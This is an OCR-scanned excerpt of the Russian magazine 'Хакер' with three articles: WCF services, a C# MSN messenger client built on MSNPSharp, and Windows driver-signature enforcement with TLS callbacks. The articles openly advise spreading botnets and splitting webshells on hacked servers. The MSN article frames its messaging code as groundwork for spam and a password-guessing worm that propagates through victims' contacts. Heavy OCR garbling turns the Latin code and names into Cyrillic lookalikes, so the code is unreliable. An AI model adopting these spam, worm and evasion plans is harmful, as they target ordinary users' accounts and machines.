Теперь вернемся непосредственно кѴѴСЕ и посмотрим, 
какой набор инструментов предоставляется разработ- 
чику. 



гФЬіі 



ЦНТТР://ѴѴѴШ 

■ I 

> Ііпкз 



• ѵѵѵѵѵѵ.хакер.ги/ 
розі/52434/ — статья 
«.ІЧЕТ РетоЕпд: про- 
граммим системы 
распределенных 
дгіб-вычислений». 

• ѵѵѵѵѵѵТесбсІаѵг.ги/ — 
официальный ресурс 
«мелокомягких», где 
хранится огромное 
количество информа- 
ции по ѴѴСЕ. 

• ШрУ/сІеіес.ги — 
мой ресурс, где ты 
можешь задать во- 
просы и поделиться 
идеями. 
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Схема организации подхода 50АР 



СКВОЗЬ ПРИЗМУ МІСР030РТ 

Обмен данными между ѴѴСР-клиентом и ѴѴСР-сервисом основан на так 
называемых «слоях». Клиент, имеющий в своем распоряжении схему 
обращения к методам сервиса, генерирует запрос к какому-либо мето- 
ду. Автоматически создается прокси (а вот и концепция ВетоЕпд’а!) 
и производится передача ему запроса (списка параметров для обра- 
щения к методу]. ѴѴСР-прокси кодирует эти параметры, добавляет 
необходимые атрибуты безопасности, и, если соответствующие опции 
заранее были активированы в конфигурационном файле, отправляет в 
транспортный канал. Далее сервис в обратном порядке извлекает этот 
запрос, соответствующим образом обрабатывает (согласно инструк- 
циям метода], и возвращает результат клиенту. Протоколом передачи 

Обмен данными между 
ѴѴСР-клиентом 
и ѴѴСР-сервисом основан 
на так называемых 
«слоях» 

данных может выступать один из стандартных протоколов: НТТР, ТСР, 
МЗМО и др. ѴѴСР «по умолчанию» основан на 50АР. Однако, если 
использовать только часть определенных слоев, то можно организо- 
вать и РЕЗТ-подход. 

В ѴѴіпбоѵѵз Соттипісабоп Роипбабоп есть три ключевых понятия: 

1. Адрес (Аббгезз]; 

2. Связывание (Віпбіпд); 

3. Контракт (Сопігасі:]. 

Эти три атрибута определяют понятие так называемой «оконечной 
точки» сервиса. Оконечная точка — «орган» связи сервиса с внеш- 
ним миром. Ее «Адрес», как ни странно, определяет адрес нахож- 
дения сервиса. Именно для предоставления адресной информации 
предоставляемых ресурсов используется ІЭ Р I (унифицированный 
локатор ресурсов, проще говоря, их адрес]. 

Элементы типа «Связывание» определяют, как будет осу- 
ществляться взаимодействие с точкой, то есть какие протоко- 
лы будут использоваться на транспортном уровне (например, 
ТсрТгапзроНВіпсІіпдЕІетепІ; — передача по протоколу ТСР], будет ли 
проверяться надежность передачи сообщения (о чем свидетельствует 
присутствие элемента ВеІіаЬІеЭеззіопВіпсІіпдЕІеппепІ:] и включена 
ли безопасность передачи 50АР-сообщений (наличие элемента 
ЭесигТуВіпсІіпдЕІетепІ:]. Каждый из этих элементов, в свою очередь, 
может иметь ряд атрибутов, уточняющих их специфику. 



Элементы типа «Контакт» представляют собой совокупность опера- 
ций, определяющих то, что оконечная точка будет сообщать внешней 
среде. По сути, операция — не что иное, как обмен сообщениями 
(запрос/ответ] или их односторонняя отправка. 

ЕСТЬ КОНТАКТ! 

Рассмотрим создание оконечной точки ѴѴСЕ-службы для того, 
чтобы последняя могла предоставлять потенциальным клиентам 
свои методы. 

Объявление Контакта заключается в создании класса и привязки 
к нему атрибута ЗегѵісеСопігасіАигіЬіііе (и тут РетоЕпд). В свою 
очередь, метод класса, который будет передавать обработанные 
данные во внешний мир, также должен помечаться атрибутом 
ОрегаЕопСопІтасШітіЬіЛе. Рассмотрим описанные действия на при- 
мере создания метода службы, который принимает два целых числа 
и отправляет их сумму обратно во внешнюю среду: 

Прототип Контракта 

[ ЗегѵісеСопЪгасЦ ] 
риЫіс іпРегіасе АсШіпРРоіпіі 

{ 

[ОрегаЫопСопРгасР] 
іпЦ АсІсЦіпЦ х, іпЦ у); 

} 

Как можно догадаться из определения Контакта — в нем должно 
произойти сложение двух чисел, а вот его реализация: 

Реализация Контракта 

риЫіс сіазз АсІсІЗегѵісе : АскІІпРРоіпЦ 
{ 

риЫіс іпі АсІсЦіпі х, іпР у) 

{ геіигп х + у; } 

} 

Теперь класс АсІсІЗегѵісе является классом ѴѴСЕ-сервиса и может 
быть вызван клиентской частью удаленно. 

Все гениальное просто. Ты можешь создать абсолютно любой метод, 
например, РаззѵѵогсІСгаск (зігі пд МЭббазЫ, и ждать заветного 
результата. Что самое примечательное — ты не будешь замечать, где 
происходят расчеты (на локальной машине или где-то на сервере в 
Зимбабве], так как ѴѴСЕ-прокси сам организует соединение с уда- 
ленной службой и аккуратно передаст тебе результаты выполнения 
удаленного метода. 

Следующий код демонстрирует определение оконечной точки: 

Определение Оконечной Точки 

риЫіс сіазз Ѵ\ГСР8егѵісеАрр 
{ 

//метод определения оконечной точки и запуска сервиса 
риЫіс ѵоісі БеііпеЕпсІроіпЫтрегаЫѵеІу ( ) 

(...) 

//эквивалентная оконечная точка в конфигурационном 
файле 

риЫіс ѵоісі БеііпеЕпсІроіпЫпСопТід ( ) 

(...) 

) 

В функции ВебіпеЕпсІ роіпіі трегаііѵеІуО объявляется экземпляр клас- 
са, который реализует нужный функционал, добавляется точка под- 
ключения по протоколу НТТР и происходит запуск службы: 

ЗегѵісеНозР зіі = пеѵ? ЗегѵісеНозЪ ( іуреоі (АсІсІЗегѵісе) ) ; 
зЪ. . АсісіЗегѵісеЕпсІроіпР ( 

Руреоі ( АскІІпРРоіпЦ ) , 
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Обмен сообщениями между Клиентом и Сервисом средствами ѴѴСР 



пе\ы МЗНССрВіпсІіпд ( ) , 

"ЬЫр: //ІосаІЪозД/АсМЗегѵісе/ЕрІ " ) ; 
вЪ. . Ореп ( ) ; 

Следующий фрагмент кода иллюстрирует процесс отправки сообще- 
ний клиентом оконечной точке АсИІпІРоіпІ: сервиса: 

риЫіс сіазз ШСЕСІіепСАрр 
{ 

//инициализация канала передачи данных 
риЫіс ѵоісі ЗепсіМеззадеТоЕпсіроіпЦ ( ) 

{ 

МаСЬРгоху ргоху = пеѵ/ МаШтРгоху ( ) ; 
іпС гезиІС = ргоху . Асій ( 3 5 , 7); 

} 

} 

Аналогичным образом клиент хранит свою оконечную точку для 
поддержки связи с оконечной точной сервиса. Кстати говоря, 
сервисы могут предоставлять целую коллекцию оконечных точек, 
а значит, предоставляют возможность использовать несколько 
различных каналов передачи данных (транспортов) и методов. 

Это дает возможность абстрагироваться от канала передачи дан- 
ных и расширить множество потенциальных клиентских платформ 
за счет использования различных протоколов передачи данных. 
Например, ты можешь синхронизировать данные, поступающие с 
твоего основного ботнета и ботнета, основанного исключительно 
на мобильных платформах. Таким образом ты потенциально рас- 
ширяешь спектр зараженных машин. Конфигурационный файл 
сервиса, расположенный вне исходного кода, позволяет легко 
активировать/деактивировать дополнительные опции сервиса 
(настройки безопасности, проверка целостности передаваемых 
данных и т.п.). К не менее приятным особенностям ѴѴСР-сервисов 
также стоит отнести полную независимость от 115-сервера (в этом 



заключается отличие от обычных веб-сервисов, работающих 
исключительно под его управлением). То есть мы можем поднять 
консольное приложение в виде сервиса, работающего по НТТР- 
протоколу. 

НТО ЖЕ ТАМ, ЗА ГОРИЗОНТОМ? 

К спектру технологий ѴѴСР можно подойти с разных позиций: 
разработка, безопасность, масштабируемость. Охватить детали 
той или иной области, которой касается ѴѴіпсІоѵѵз Соттипісабоп 
Рои псіаѣіоп, невозможно в рамках одной статьи. Да мы такой 
задачи перед собой и не ставили. Рассмотрев детали быстрой 
организации клиент-сервисной (именно сервисной) архитектуры, 
мы создали плацдарм для дальнейших исследований и непо- 
средственного испытания майкрософтоской технологии в боевых 
условиях. 

Распределение может быть полезно в любой окружающей нас обла- 
сти. Кто знает, может быть повседневные вещи в распределенном 
состоянии окажутся намного более удобными, и ты скажешь: «Как же я 
раньше до этого не додумался?». Вот, например, взгляни на свои веб- 
шеллы. Вспомни, как быстро их палят и прикрывают. Задумайся, поче- 
му? Потому что ты сам делаешь для этого все возможное: обращаясь 
каждый раз к одному и тому же сомнительному скрипту по несколько 
раз за день, ты оставляешь в логах веб-сервера избыточную информа- 
цию для бдительного администратора. А теперь представь, насколько 
возрастет степень твоей анонимности и конфиденциальность операций 
на взломанном сервере, если ты раскидаешь функционал своего веб- 
шелла по его нескольким неприметным уголкам обращение его частям. 
Предоставленный материал представляет собой лишь вводную 
часть к той длинной истории, которая называется «ѴѴСР-сервис и 
сорок разбойников», коими выступают придуманные тобою серви- 
сы. Ознакомившись с теоретической составляющей и бегло освоив 
базовые конструкции и детали конфигурации сервисной части, ты 
получаешь в свое распоряжение мощный инструмент реализации 
своих самых распределенных идей. Свои я уже реализовал и 
намерен поделиться ими с тобой на страницах нашего журнала , т 



ХАКЕР 10/141/ 10 



► 115 








С0ЭІЫ6 



I Михаил Фленов ѵѵѵѵѵѵ.ііепоѵ.іпіо 



XI 




XI 



1 * 



САМОПАЛЬНЫЙ 




* 



* 



МЗЫ-КЛИЕНТ НА СИШАРПЕ 



Готовим почву для создания 
антиамериканского М-спамера 



Какой самый популярный ІМ-клиент в России? Конечно же, аська. 

А в США? Конечно, ІО. Даже те, кто сидят на маках (в смысле, 
компьютерах), пользуются этим мессенджером. И даже те, кто сидят 
на маках опийных, тоже пользуются майкрософтовской системой 
быстрых сообщений. 



КАК ОНО РАБОТАЕТ? 

Из этого следует простой вывод — хочешь внедриться в спам-бизнес, 
затрагивающий цивилизованные страны (те, где у людей есть деньги] — 
изучай их ПО, знай их протоколы передачи данных. 

Когда я впервые (это было довольно давно) решил разобраться с рабо- 
той протокола Місгозоіі: Меззепдег, то оказалось, что в интернете не так 
уж и много информации по этой теме. При этом сама Місгозоіі: по ходу 
пьесы притворилась Буратино, или тем, из чего это существо сделано 
— я беседовал с сотрудниками компании, искал в интернете блоги про- 
граммистов, работающих в М5, просил их поделиться знаниями. Все 
бесполезно. 

На некоторое время я оставил попытки узнать про протокол, но через 
полгодика наткнулся на библиотеку М5ЫР5багр ( Ыі:р://сосІе.доод1.е. 
сот/р/тзпр-збагр/ ). Долгое время эта библиотека лежала у меня на 
диске мертвым грузом, но вот недавно на работе мне пришлось писать 
модуль, который должен был рассылать сообщения на М5І\І-клиенты. 

Я тут же вспомнил про М5ЫР5Ьагр, скачал последнюю версию и разо- 
брался с ней в два счета. 

ПОЛЗУЧАЯ ТВАРЬ 

Точек приложения для этой библиотеки много — от легального софта до 
реализации различных противозаконных программулин, вроде спаме- 
ров и червяков. Ну, например, работающих вот так: 

1. Пытаемся разослать приглашения на общения; 

2. Если кто-то отзывается, то пытаемся заставить пользователя принять 
и запустить файл. В свое время таким же образом распространялись 
вирусы по почте, и вполне успешно; 

3. Если кто-то повелся и запустил файл, то этот файл рассылает себя 
дальше. 



Еще один сценарий — написать программу, которая будет подбирать 
пароли к аккаунтам из списка по словарю. Если аккаунт взломан (а чем 
больше аккаунтов, тем проще найти ламера с примитивным паролем], 
то можно прочитать содержимое контактов и разослать файл от имени 
ламера. Такая рассылка отработает намного эффективнее, потому что 
М5І\Гу пока доверяют. 

АСИНХРОННАЯ МОДЕЛЬ 

Все в библиотеке крутится вокруг класса Меззепдег, который создается 
банально и без параметров: 

Меззепдег шеззепдег = п ем Меззепдег () ; 

Класс работает с протоколом в асинхронном режиме. И за это разра- 
ботчикам М5ЫР5багр однозначно нужно пожать руку. Дело в том, что 
если бы класс работал в синхронном режиме, то на нас свалилась бы 
куча проблем по асинхронизации. Некоторые команды выполняются 
очень долго. Например, в момент скачивания контактов класс может 
капитально заснуть на несколько секунд. Если выполнять операцию 
синхронно, то в спячку ушло бы все приложение, а так — только класс. 
Просто вызывай нужную функцию, и жди, когда она сгенерит соответ- 
ствующее событие. 

Событий у класса довольно много. Вот минимальный набор, который 
может пригодиться в реальной жизни: 

• МашезегѵегРгосеззог . СоппесСіопЕзСаЫізІіесІ — генери- 
руется, когда соединение удачно установлено; 

• Ыатезегчег . ЗідпесІІп — мы вошли в систему; 

• Ыатезегѵег . ЗідпесіОПП — удачно вышли, прямо как 
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Винни-Пух, у которого все прекрасно входит и выходит; 

• Еашезегѵег . АибЛепбісабіопЕггог — авторизация не прошла; 

• СопѵегзабіопСгеабесІ — начато общение с удаленным 
клиентом . 

Достаточно установить обработчик на каждое событие, и можно начи- 
нать соединение с сервером. Хотя подожди. Сначала нужно указать свои 
данные — те, с которыми мы подключаемся к серверу. У класса мессен- 
джера есть свойство Сгесіепбаіз, которое имеет одноименный тип. 

У конструктора класса Сгебепііаіз есть два параметра — почтовый ящик 
и пароль в чистом и красивом виде. Итак, параметры учетной записи, 
с помощью которой мы будем подключаться к серверу сообщений, про- 
писываем следующим образом: 

шеззепдег . Сгебепбіаіз = пеѵі Сгебепбіаіз ( 
"уоиассоипД@Тюбтаі1 .сот" , "фѵегбу" ) ; 

Если ты подцепился на все нужные нам обработчики событий и указал 
учетную запись, можно запускать процесс коннекта к серверу методом 
СоппесШ;. 

ПОБОЛТАЕМ 

Разговоры между незнакомыми абонентами категорически запре- 
щены, и этот запрет представляет собой реальное западло для хаке- 
ра. Чтобы кого-то вызвать на серьезный и жесткий разговор, нужно 
сначала направить приглашение, и только если твой іпѵіЕе приняли, 
можно посылать сообщения. Такой протокол должен предотвращать 
бесконтрольные рассылки заразы, которые происходят в классической 
е-почте. Правда, теоретически вполне реально написать червя, кото- 
рый будет распространяться по алгоритму Морриса, ведь все хорошее 




новое — это хорошо забытое старое. Вспомним, как работал один из 
самых нашумевших червей. Для взлома аккаунтов он использовал под- 
бор паролей по словарю, который брал из *піх-системы. Так как в те 
времена о безопасности мало думали даже специалисты, червь удачно 
ломал системы. 

Сейчас о безопасности думают больше, но только специалисты и про- 
двинутые пользователи. Ламеров на просторах нашей Сети все еще 
очень много, поэтому можно попробовать повторить взлом. Проникая 
на компьютер, можно попытаться взломать М 5 N -аккаунты банальным 
перебором всех почтовых ящиков, которые есть в адресной книге. Если 
что-то взломалось, то подключаемся от имени лохоюзера и рассылаем 
себя других лохоюзерам Сети. Известный факт — когда файлы приходят 
от друзей, то их запускают намного чаще. Итак, чтобы отправить кому-то 
сообщение, мы сначала должны пригласить его в свой список друзей- 
товарищей. Все, что касается адресной книги М5Ы, находится в классе 
Ыатезегѵег мессенджера. Чтобы пригласить нового друга, вызываем 
метод АсИЫеѵѵСопІасІ: сервиса Соп1:ас1:5егѵісе. Запутался? Проще один 
раз показать, чем десять раз рассказать: 

Меззепдег . Ыатезегѵег . СопСасСЗегѵісе . 

АбсШемСопбасб ( "рате1а_апбегзоп@Тюбтаі1 . сот" ) ; 

Теперь о том, как получить список контактов. Контакты находятся в свой- 
стве СопіасНізІ:, которое является достаточно серьезным классом. Если 
тебе нужны все контакты, то обращайся к коллекции АН (СопІасіизТАЩ. 
Помимо этого можно увидеть следующие типы контактов: 

• Аіісжесі — разрешенные контакты; 

• ВІоскебЫзб — здесь мы можем увидеть юзеров, которых 
заблокировали . 

Сам по себе список не синхронизируется с сервером, и сразу после 
подключения все списки контактов будут пустыми. Дело в том, что эта 
операция происходит довольно медленно. Если нужно забрать с серве- 
ра свои контакты, то можно изменить свойство АиІоЗупсНгопіге на Ітие: 

шеззепдег . Ыатезегѵег . АибоЗупсІігопіге = бгие; 

Если же скорость старта тебя особенно не волнует, то изменение 
свойства АіПоЗупсЬгопіге можно поместить в обработчике события 
СоппесііопЕзІаЫізЬесІ. Это вполне логично — сразу после установки 
подключения синхронизировать контакты. 

ОБЩЕНИЕ 

Когда мы вошли в систему, то есть произошло событие ЗідпесІІп, мы 
можем изменять состояние и начинать общаться. Чтобы показать, что 
ты в сети и готов к общению, измени свое состояние на опііпе следую- 
щим образом: 

шеззепдег . Оѵтпег . Збабиз = РгезепсеЗбабиз . Опііпе; 

Разумеется, для спама и прочих сомнительных с точки зрения закон- 
ности мероприятий статус значения не имеет — сообщения можно слать 
и при РгезепсеЭ^аШз.Визу. Лично мне кажется, что с психологической 
точки зрения занятость даже более предпочтительна — если собесед- 
ник занят, но отправляет тебе что-то, ты не будешь приставать к нему с 
лишними вопросами о том, что это и зачем. 

Теперь сама отправка сообщения. Этот процесс чуть более запутан. 

Для этого нужно создать новое общение, за которое отвечает класс 
Сопѵегзабоп: 

Сопѵегзабіоп сопѵегзабіоп = 

шеззепдег . СгеабеСопѵегзабіоп ( ) ; 

Теперь просто дожидаемся, когда сработает событие 
СопѵегзабопСгеаІесІ. А вот уже когда новое общение создано, мы 
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должны найти в списке контактов человека, которому хотим отправить 
послание, и пригласить его на разговор. 

Допустим, что теззепдег-аккаунт человека, которому мы хотим отпра- 
вить сообщение, находится в строковой переменной МзпАссоипіТо: 

ргіѵаСе ѵоісі теззепдег_СопѵегзаСіопСгеаЦесі ( 

окдесС зепсіег, СопѵегзаСіопСгеаСесіЕѵепЦАгдз е) 

{ 

іі (е . ІпіСіаСог != пиіі) 

{ 

іогеасЪ. (МЗЫРЗІіагр . СопСасС 

сопСасС іп теззепдег .СопСасСЬізС . АН) 

{ 

іі (сопСасС .Маіі == МзпАссоипСТо) 

{ 

е . СопѵегзаСіоп. СопСасІгіГоіпесі += 

пеы ЕѵепСНап(і1ег<Соп1іас1гЕѵепСАгдз> ( 
СопСасСіТоіпесІ) ; 

е . СопѵегзаСіоп. ІпѵіСе (сопСасС) ; 
геСигп; 

} 

} 

теззепдег . Ыатезегѵег . СопСасШЗегѵісе . АсісШемСопСасС 
(МзпАссоипСТо) ; 

} 

} 

Код банален — мы просто ищем контакт в списке всех, кого мы знаем. 
Если чей-то почтовый ящик совпадает с тем, кого мы хотим нежно и 
ласково полюбить, то вызываем этого человека на разговор. Созданная 
беседа покоится в свойстве Сопѵегзабоп второго параметра события. 

Мы должны подписаться на событие СопіасУоіпесІ этого класса обще- 
ния, чтобы узнать, когда удаленный пользователь готов пообщаться: 

е . СопѵегзаСіоп. СопСасСІГоіпесі + = 

пем ЕѵепСНапс11ег<СопСасСЕѵепСАгдз> (СопСасЦІГоіпесі) ; 

А приглашение на этот разговор делается вызовом метода Іпѵііе и ука- 
занием ящика бедолаги: 

е . СопѵегзаСіоп. ІпѵіСе (сопСасС) ; 



Тут нужно быть внимательным и аккуратным. Событие Сопѵег- 
забопСгеаіесІ может вызываться несколько раз. Я не понял, с какого 
перепуга это происходит, но факт есть факт — приходится гасить повто- 
ряющуюся генерацию события. Это можно сделать, например, вводя 
дополнительную булеву переменную, которая будет устанавливаться при 
создании общения и гаситься после обработки события. Если перемен- 
ная не установлена, то игнорировать событие. 

Но и это еще не все. Теперь в недрах библиотеки снова начинается 
асинхронный для нас процесс, по завершению которого вызывается 
событие СопіасУоіпесІ. И вот в нем мы уже можем отправить пользова- 
телю сообщение. Следующий пример показывает, как отправить про- 
стое текстовое послание: 

ргіѵаіе ѵоісі СопСасСіГоіпесі (окдесС зепсіег, 
СопСасСЕѵепЦАгдз е) 

{ 

ТехСМеззаде шеззаде = 

пем ТехСМеззаде (сиггепСтеззаде) ; 

(зепсіег аз СопѵегзаСіоп) . ЗепсіТехСМеззаде (шеззаде) ; 

} 

В первой строке мы подготавливаем текстовое сообщение к отправке. 
Оно должно иметь тип класса ТехіМеззаде. Конструктору этого класса 
мы банально передаем строку текста. 

Так как событие генерирует класс Сопѵегзабоп, то первый параметр как 
раз на него и указывает, и мы можем его использовать. Например, для 
вызова метода ЭепбТехіМеззаде с целью непосредственной отправки 
сообщения. 

На уже созданном классе Сопѵегзабоп и пришедшем на разговор уда- 
ленным клиентом, можно отсылать несколько сообщений подряд. Если 
пользователь не в сети, Сопѵегзабоп все равно будет создан. 

ИТОГО 

Вот и все. Еще раз повторю, что М5Ы реально популярен в США — 
лишь однажды я видел контору, в которой использовали Зкуре, но при 
ближайшем рассмотрении оказалось, что большинство ее программи- 
стов сидят в Петербурге. На диске к журналу ты найдешь небольшой 
класс-помощник, который упрощает работу с библиотекой и сводит 
отправку сообщений к вызову всего одного метода, если не считать кон- 
структора, который вызывается автоматом при инициализации объекта. 
В большинстве простых ситуаций этого класса будет достаточно, □с 
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КОДЕРСКИЕ 

ТИПСЫИТРИКСЫ 

Спецвыпуск: трюки для (не очень) начинающих 
системщиков 

Хочешь стать уверенным пользователем своего компьютера? Легко 
находить кнопку «Пуск» и запускать игру «Сапер»? Хочешь, чтобы 
твои друзья завистливо смотрели на тебя, потому что ты начал 
пользоваться заветными «горячими клавишами» АІІ+ТАВ? Если да, 
то скажи мне, зачем ты взял журнал старшего брата? Разве он для 
тебя его покупал? Отдай журнал немедленно! 



Отдал? Хорошо. В этой статье мы будем распиливать циркулярной 
пилой такие вещи, как Огіѵег Зідпаіиге Епіюгсетепі:, немало оза- 
ботившую в свое время драйверописателей, а также ТІ_5 — ТЬгеасІ 
І_осаІ Зіогаде, этакого неотъемлемого и скрытого соседа любого 
РЕ-файла. 

Кое-что о уѵег Зідпаіиге 
Ептогсетепі 3 

Как известно, начиная с ѴѴіпсІоѵѵз Ѵізіа, парни из МісгозоІР серьезно 
озаботились загрузкой неподписанных (читай — чужих] драйверов в 
систему (для Ѵізіа речь идето 64-битной версии]. В первую очередь это 
было сделано, наверное, для защиты системы от руткитов, основная 
боевая часть которых зависит отдрайвера ядра. В результате это при- 
вело к всевозможным проблемам, доставшимся системным разработ- 
чикам, занятым в разработке драйверов. Теперь для успешной загрузки 
драйвера в ѴѴіпсІоѵѵз ѴізІа/7 нужна была цифровая подпись, а ее нужно 
было покупать за немаленькие деньги утаких компаний, какѴегізідп или 
ТЬаѵѵІю. 

Разработчики руткитов из-за этих новостей несильно огорчились. Вме- 
сто того, чтобы огорчаться, они начали искать «левые» пути и лазейки, 
позволяющие грузить неподписанные драйвера в систему. У них это, 
традиционно, получилось, и первой среди них была наша любимая 
красавица — Рутковска. 

Я не буду рассказыватьтебе об этих способах, о нихты вполне сможешь 
прочесть в интернете. Вместо того, чтобы есть чужую рыбу, мы лучше 
возьмем свою удочку и посмотрим, что можно выудить из этого забавно- 
го механизма — ОгіѵегЭідпаІиге ЕпЬгсетепЕ 

Его «сердцем» является библиотека сі.сііі, которая, как всегда, распола- 
гается в папке /%5у5ІетгооІ%/5у5Іет32. Экспортирует она следующие 
функции: 



• СіСкескЗідпесІЕіІе 

• СіЕіпсІРадеНазкезІпСакаІод 

• СіЕіпсІРадеНазкезІпЗідпесІЕіІе 

• СіРгееРоІісуІпРо 

• СіСекРЕІпРогтакіоп 

• Сііпікіаііге 

• СіѴегіРуНазЬіпСакаІод 

Самая интересная здесьфункция — Сііпіііаііге, она импортируется 
ядром во время процесса инициализации системы, ее псевдокод вы- 
глядит примерно таким образом: 

ѴОІБ ЗерІпіРіаІігеСосІеІпВедгіВу ( ) 

{ 

ЦЬОШ СіОрСіопз ; 

{ зрірресі. . . } 

шетзеС ( д_СіСа11Ьаскз , 0, 3*зігеоР ( ЗІ2Е_Т )); 
СіОркіопз = 4 | 2 ; 

ІР (КеІіоасІегВІоск) 

{ 

ІР (* (ІІЪОШ*) (КеЪоасІегВІоск+84 ) ) 

{ 

ІР (ЗерІзОрРіопРгезепР ( (КеЬоасЗегВІоск+84 ) , 

Ь " БІЗАВЕЕ_І]МТЕСКІТУ_СНЕСКЗ " ) ) 

СіОрРіопз = 0; 

ІР (ЗерІзОрРіопРгезепР ( (КеЬоасЗегВІоск+84 ) , 

Ь " ТЕЗТЗІСРГІЫС " ) ) 

СіОрРіопз 1=8; 

} 

СіІпіРіаІі^е (СіОрРіопз , (КеЬоасІегВІоск+32 ) , 
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&д_СіСа11Ьаскз ) ; 

} 

} 

Самое интересное здесьто, что Сіігпбаііге возвращаетобратно в ядро 
три указателя на функции: 

д_СіСа11Ьаскз [ 0 ] = СІ ! СіѴаІісІакеІтадеНеасІег , 
д_СіСа11Ьаскз [ 1 ] = СІ ! СіѴаІісІакеІтадеВака , 
д_СіСа11Ьаскз [2 ] = СІ ! СіОиегуІпІогтакіоп . 

Запомним это и посмотрим на законченный стек вызовов функций на 
самом раннем этапе инициализации системы: 

пД ! ЗерІпіДіаІігеСосІеІпДедгіДу 
пД ! ЗерІпіДіаІігаДіопРказеІ + Охіаі 
пД ! ЗеІпіДЗузДеш + 0x29 

пД ! РказеІІпіДіаІігаДіопБізсагсІ + 0х7се 
пД ! РказеІІпіДіаІігаДіоп + Охсі 
пД ! РзрЗузДешТкгеасІЗДагДир + 0х9е 
пД ! КіТкгеасІЗДагДир + 0x19 

Какздесь можноувидеть, ЗерІпібаІігеСосІеІпІюдгку (а вернее, 
Сііпібаііге) создает некие необходимые в дальнейшем условия для 
успешной загрузки системы. Если мы полезем вглубь Сііпібаііге.то 
увидим, что эта функция проверяет валидность драйверов, находя- 
щихся в Вооі: Огіѵег Ыбі; (то есть, грузящихся при старте]. Если во время 
этого процесса будут обнаружены ошибки, то процесс загрузки будет 
остановлен. 

Продолжаем рассматривать процесс загрузки драйверов в систему. 
Стек вызовов системных функций в этом случае в ѴізІа/7 будет выгля- 
деть следующим образом: 

пД ’МшЬоасІЗузДетІтаде 
пД ’МіОЬДаіпЗесДіопРогБгіѵег 
пД ’МіСгеаДеЗесДіопРогБгіѵег 
пД ! МтСЬескЗузДешІтаде 



пД ! РГДСгеаДеЗесДіоп 
пД ! МтСгеаДеЗесДіоп 
пД ! МіѴаІісІаДеІтадеНеасІег 
пД ! ЗеѴаІісІаДеІтадеНеасІег 

пД !_д_СіСа11Ьаскз [ 0 ] т.е. СІ ! СіѴаІісІаДеІтадеВаДа 

Интересдля нас представляет 5еѴаІісІа1:еІтадеНеасІег— она проверяет, 
естьли цифровая подписьудрайвера. 

Делаетона это следующим образом: 

Сначала идет проверка переменной п I ! д_С і Е п а Ые сІ (ее смысл, думаю, 
расшифровывать нет необходимости :)) и, если она установлена вТРІЧЕ, 
проверитзначениеуказателя пі!д_СіСаІІЬаскз[0]. Если последний не 
равен N11 ЕЙ, то вызовет эту функцию и вернет управление. Если же 
пі!д_СіСаІІЬаскз[0] будет пустым, то она вернет статус 0хс0000428, что в 
переводе на общечеловеческий язык соответствует «ѴѴіпбоѵѵз саппоі; 
ѵегібу 1Ье сіідііаізідпаіиге оіЧЫзбІе». 

Если же переменная пЕд_СіЕпаЫесІ равна ЕАЕ5Е, то функция выделит 
в памяти один байт, скопируеттуда указатель на свой первый аргумент, 
после чего с чистой совестью вернет 5ТАТиЗ_51ІССЕ55. Все! Воттаким 
вотнехитрым способом ѴѴІ псіоѵѵ5 Ѵізіа / 7 проверяет наличие и валид- 
ность цифровой подписи, чтобы загрузить драйвер. 

Вывод: проверка того, будет ли загружен драйвер в систему, зависит 
всего лишь от одной переменной. И если кто-либо захочет выключить 
эту проверку — все, что нужно будет сделать — это переписать в памяти 
один байт. Правда, сделать это будет довольно сложно, потому что ни 
п1:!д_Сі ЕпаЫесІ, ни пѣІдСіСа ІІЬаскз не экспортируются ядром и найти их 
будет проблематично. 

КТРМ 

Что ты знаешь о ТЕЗ? ТЬгеасІ ЕосаІЗіогаде, илилокальная памятьпотока 
— наверное, самая документированная из самых недокуметированных 
возможностей ѴѴіпбоѵѵз. 

Итак, оно обычно используется программистами в многопоточных 
приложениях. Рихтер в своей библии системного программирования 
приводиттакой пример — с каждым потоком в ТЕЗ связывается дата 
и время, когда он был создан. В моментуничтожения потока можно 
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Точно, не выходит... 



Ну что, Данила-мастер, не выходит каменный 
цветок? 
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посчитать время, в течение которого поток существовал. Сценарии, где 
есть данные, которые связаны одновременно и с программой в целом, 
и с отдельным потоком в частности, вынуждают использоватьТБЗ. На- 
пример, пусть процесс владеет некоторым массивом. Каждый элемент 
массива вместе с его содержимым соответствует отдельному потоку. От- 
куда потокузнает, какой индекс в глобальном массиве — его? Да, можно 
передать функции потока ТЬгеабРгос параметр в виде индекса... но это 
все известные стороны медали. Что не лежит на поверхности ТИС? Что 
мы о нем не знаем? 

Реализация механизма ИЗ в ѴѴіпсІоѵѵз предусматривает два варианта 
— явный, который можно задействовать набором функций, импорти- 
руемых кегпе132 (ТІзОеіѴа Іие, ТІзЗеА/аІие, ТІзАНос и ТІзЕгее], и второй, 
неявный, который позволяет создавать и использовать такназываемые 
локальные переменные потока, для чего при их объявлении использу- 
ется сІесІзрес(іЬгеасІ] . Ты можешь спросить: «В чем же разница между 

ними?». Отвечу: при использовании ИЗ в своих грязных целях следует 
помнить об одной неочевидной вещи — в операционках до ѴѴіпсІоѵѵз 

Ѵігіа использование переменных, объявленных как бес1зрес(1;Ьгеаб] 

в библиотеке, которая грузится явно через вызов І_оасИ_іЬгагу(Ех), 
закончится ошибкой Ассезз Ѵіоіабоп. Почему? Все дело в том, что 

ключевое слово бесІзрес(і:ЬгеасІ) имеет некоторые ограничения. Если 

библиотека ОН объявляетлюбые нелокальные данные или объекты как 
сіесізресі ЕЬгеасІ ) , то это может привести ксбою защиты при динами- 
ческой загрузке. Послезагрузки библиотеки ОЕЕс помощью функции 
БоасіиЬгагу возможен сбой в системе всякий раз, когда код ссылается 

на нелокальные данные сіесізресі Шгеаб ]. Пространство глобальных 

переменных для потока выделяется во время выполнения, поэтому 
размер данного пространства определяется, исходя из расчетовтребо- 
ваний приложения, атакже требований всех статически компонуемых 
библиотек ОН. При использовании функции БоасіиЬгагу не существует 
способа расширения этого пространства, чтобы разрешить объявление 

локальных переменных потока с ключевым словом сіесізрес (Шгеаб]. 

Поэтому в таких случаях в библиотеках ОН следует использовать АРІ- 
функции ИЗ, такие какТІзАНос, чтобы разместить ИЗ, если библиотека 
ОН загружается с помощью функции БоасіиЬгагу. 



Уф, надеюсь, доступно разъяснил. Но что стого? КакТБЗ можно исполь- 
зовать в контексте компьютерной безопасности? А воттак! 

РЕ-формат поддерживает функции обратного вызова (ИЗ-са ІІЬаск) , 
автоматически вызываемые системой до передачи управления на точку 
входа. В частности, это позволяетопределить наличие отладчика или 
скрытно выполнить некоторые действия. Если РЕ-файл имеетсвои 
калбэки, они могут изменять таблицу ИЗ во время исполнения. Это зна- 
чит, что, если утебя установлен один калбэк, он легко сможет добавить 
